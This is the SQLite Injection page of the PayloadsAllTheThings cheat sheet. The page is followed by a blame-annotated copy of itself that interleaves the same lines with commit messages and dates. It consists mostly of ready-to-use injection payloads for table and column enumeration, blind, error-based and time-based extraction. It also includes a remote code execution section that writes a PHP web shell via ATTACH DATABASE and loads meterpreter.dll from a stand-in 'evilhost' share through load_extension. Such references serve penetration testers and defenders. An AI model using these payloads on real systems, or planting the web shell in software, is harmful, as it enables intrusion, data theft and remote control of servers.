PayloadsAllTheThings/SQL Injection/SQLite Injection.md

# SQLite Injection

> SQLite Injection  is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. 


## Summary

* [SQLite Comments](#sqlite-comments)
* [SQLite Version](#sqlite-version)
* [SQLite String](#sqlite-string)
    * [SQLite String Methodology](#sqlite-string-methodology)
* [SQLite Blind](#sqlite-blind)
    * [SQLite Blind Methodology](#sqlite-blind-methodology)
    * [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)
* [SQlite Error Based](#sqlite-error-based)
* [SQlite Time Based](#sqlite-time-based)
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
    * [Attach Database](#attach-database)
    * [Load_extension](#load_extension)
* [References](#references)


## SQLite Comments

| Type                       | Description                       |
|----------------------------|-----------------------------------|
| `/* SQLite Comment */`     | C-style comment                   |
| `--`                       | SQL comment                       |


## SQLite Version

```sql
select sqlite_version();
```

## SQLite String

### SQLite String Methodology

| Description             | SQL Query                                 |
| ----------------------- | ----------------------------------------- | 
| Extract Database Structure                           | `SELECT sql FROM sqlite_schema` |
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
| Extract Table Name  | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |


## SQLite Blind

### SQLite Blind Methodology

| Description             | SQL Query                                 |
| ----------------------- | ----------------------------------------- | 
| Count Number Of Tables  | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` | 
| Enumerating Table Name  | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` | 
| Extract Info            | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` | 
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` | 


### SQLite Blind With Substring Equivalent

| Function    | Example                                   |
| ----------- | ----------------------------------------- | 
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)`  | 
| `SUBSTR`    | `SUBSTR('foobar', <START>, <LENGTH>)`     | 


## SQlite Error Based

```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```


## SQlite Time Based

```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```


## SQLite Remote Code Execution

### Attach Database

```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
```

### Load_extension

:warning: This component is disabled by default.

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```


## References

* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`# SQLite Injection`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.`


Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`## Summary`

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`* [SQLite Comments](#sqlite-comments)`
			`* [SQLite Version](#sqlite-version)`
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`* [SQLite String](#sqlite-string)`
			`* [SQLite String Methodology](#sqlite-string-methodology)`
			`* [SQLite Blind](#sqlite-blind)`
			`* [SQLite Blind Methodology](#sqlite-blind-methodology)`
			`* [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)`
			`* [SQlite Error Based](#sqlite-error-based)`
			`* [SQlite Time Based](#sqlite-time-based)`
			`* [SQlite Remote Code Execution](#sqlite-remote-code-execution)`
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`* [Attach Database](#attach-database)`
			`* [Load_extension](#load_extension)`
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`* [References](#references)`
SQL injections references updates 2024-11-03 13:06:53 +00:00

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## SQLite Comments`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Type \| Description \|`
			`\|----------------------------\|-----------------------------------\|`
			\| `/* SQLite Comment */` \| C-style comment \|
			\| `--` \| SQL comment \|

SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## SQLite Version`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`select sqlite_version();`
			```
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite String`
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite String Methodology`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Description \| SQL Query \|`
			`\| ----------------------- \| ----------------------------------------- \|`
			\| Extract Database Structure \| `SELECT sql FROM sqlite_schema` \|
			\| Extract Database Structure (sqlite_version > 3.33.0) \| `SELECT sql FROM sqlite_master` \|
			\| Extract Table Name \| `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` \|
			\| Extract Column Name \| `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` \|
			\| Extract Column Name \| `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` \|
Update SQLite Injection.md Column names of the specified table can be more easily extracted in a better output. Tested during the CTF 2023-08-25 10:24:52 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite Blind`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite Blind Methodology`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Description \| SQL Query \|`
			`\| ----------------------- \| ----------------------------------------- \|`
			\| Count Number Of Tables \| `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` \|
			\| Enumerating Table Name \| `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` \|
			\| Extract Info \| `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` \|
			\| Extract Info (order by) \| `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` \|
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite Blind With Substring Equivalent`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Function \| Example \|`
			`\| ----------- \| ----------------------------------------- \|`
			\| `SUBSTRING` \| `SUBSTRING('foobar', <START>, <LENGTH>)` \|
			\| `SUBSTR` \| `SUBSTR('foobar', <START>, <LENGTH>)` \|
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00

MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQlite Error Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00
			`## SQlite Time Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite Remote Code Execution`
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00
			`### Attach Database`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`ATTACH DATABASE '/var/www/lol.php' AS lol;`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`CREATE TABLE lol.pwn (dataz text);`
Single quotes are messing with the command. 2022-05-15 11:53:50 +00:00			`INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```

References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`### Load_extension`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`:warning: This component is disabled by default.`

SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
SQL injections references updates 2024-11-03 13:06:53 +00:00
Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL injections references updates 2024-11-03 13:06:53 +00:00			`* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)`
			`* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)`
			`* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)`